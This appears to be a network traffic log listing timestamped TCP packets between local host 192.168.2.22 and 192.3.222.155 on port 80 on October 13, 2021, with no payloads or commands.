Oct 13, 2021 17:05:26.456638098 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456675053 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456676960 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456716061 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456754923 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456842899 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456855059 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456860065 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456865072 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456865072 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456870079 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456873894 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456904888 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456911087 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456912041 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.456949949 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456989050 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.456990957 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.457036018 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.457063913 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.457072020 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458285093 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458327055 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458365917 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458403111 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458405018 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458441019 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458441019 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458472013 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458478928 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458507061 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458517075 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458537102 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458543062 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458564043 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458575010 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458606958 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458630085 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458643913 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458662033 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458683014 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458703041 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458720922 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458733082 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458756924 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458786011 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458796024 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458816051 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458832979 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458853006 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458892107 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458899021 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458935022 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.458969116 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.458972931 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459021091 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459068060 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459104061 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459135056 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459141970 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459144115 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459146976 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459213018 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459232092 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459270000 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459280968 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459323883 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459336996 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459387064 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459398031 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459449053 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459453106 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459502935 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459513903 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459563017 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459567070 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459624052 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459630966 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459681034 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459700108 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459737062 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459794044 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459804058 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459849119 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459903002 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459916115 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459923983 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459928036 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.459959984 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.459978104 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460019112 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460035086 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460073948 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460089922 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460129976 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460148096 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460190058 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460205078 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460247040 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460264921 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460308075 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460338116 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460367918 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460385084 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460424900 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460444927 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460483074 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460485935 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460541010 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460556984 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460597992 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460603952 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460647106 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460664034 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460686922 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460750103 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460767984 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460777998 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.460812092 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460870981 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460932970 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460978031 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.460968018 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461026907 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461076975 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461113930 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461153030 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461189985 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461225033 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461261988 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461292982 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461297989 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461344957 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461385965 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461421967 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461458921 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461497068 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461534023 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461570978 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461534977 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461606979 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461653948 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461694956 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461730957 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461769104 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461806059 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.461827993 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461850882 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461855888 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461864948 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461875916 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461884975 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461894989 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461899996 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461905003 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461910009 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461914062 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461918116 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461921930 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461926937 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461931944 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461955070 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461961031 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461965084 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461970091 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461975098 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461980104 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461983919 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.461987972 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.462312937 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.462344885 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.462395906 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.462420940 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.462462902 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.462497950 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.462562084 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.462565899 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.462625980 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.462626934 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.462688923 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.462691069 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.462749004 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.469518900 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.470114946 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.630456924 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630505085 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630542040 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630575895 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630619049 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630657911 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630692005 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.630692959 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630728960 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630745888 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.630755901 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630784035 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630820036 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630831957 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.630841017 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.630856037 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630871058 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.630891085 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630908012 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.630933046 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.630945921 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.630973101 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.630976915 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631016016 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631026030 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631050110 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631052971 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631081104 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631084919 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631176949 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631194115 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631228924 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631243944 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631272078 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631273985 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631311893 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631318092 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631345987 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631347895 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631376982 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631381035 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631416082 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631426096 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631448984 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631458044 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631484032 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631489038 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631515026 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631516933 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631558895 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631561041 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631598949 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631604910 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631633043 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631637096 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631669998 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.631681919 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.631711006 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.633713007 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636017084 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636087894 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636110067 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636126995 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636136055 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636166096 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636171103 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636209965 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636244059 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636250973 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636260986 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636300087 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636305094 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636336088 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636337996 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636373997 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636384010 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636411905 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636414051 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636450052 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636460066 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636488914 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636496067 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636538982 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636542082 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636569977 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636575937 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636614084 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636619091 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636648893 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636652946 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636687994 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636698961 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636724949 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636727095 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636764050 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636774063 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636807919 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636811018 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636852026 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636852980 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636889935 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636892080 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636929035 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636929989 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.636966944 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.636970997 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637003899 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637006044 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637042046 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637043953 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637079000 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637080908 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637121916 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637126923 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637167931 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637168884 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637206078 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637207985 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637243986 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637258053 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637281895 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637284994 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637319088 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637322903 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637356043 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637356997 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637393951 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637396097 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637439966 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637444973 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637482882 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637485981 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637496948 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637520075 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637520075 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637557983 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637561083 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637595892 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637600899 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637631893 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637634993 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637669086 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637670994 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637706041 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637708902 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637744904 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637753010 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637794018 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637794971 CEST	80	49167	192.3.222.155	192.168.2.22
